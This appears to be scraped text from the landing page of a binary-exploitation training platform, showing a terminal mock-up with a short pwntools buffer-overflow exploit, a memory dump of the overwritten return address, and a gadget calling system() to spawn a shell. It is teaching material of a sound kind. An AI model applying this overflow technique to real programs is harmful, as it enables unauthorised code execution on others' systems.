Binary Exploit Lab
Advanced cybersecurity research and education platform
exploit@lab
~/courses
$
|
[+] Binary Exploit Lab v2.1.0 initialized
[*] Loading vulnerability research modules...
Available courses: 24 | Active students: 1,247 | Challenges solved: 8,934
#!/usr/bin/env python3
# Basic buffer overflow exploit
import
struct
from
pwn
import *
offset =
276
ret_addr =
p64(
0x400686)
payload =
b"A" * offset + ret_addr
0x7fff8000:
41 41 41 41 41 41 41 41
AAAAAAAA
0x7fff8008:
41 41 41 41 86 06 40 00
AAAA..@.
0x7fff8010:
00 00 00 00 00 00 00 00
........
0x400686:
mov
rdi, 0x400754
0x40068d:
call
0x400560 <system@plt>
[+] Exploitation successful - Shell spawned!
exploit@lab
~/courses
$
|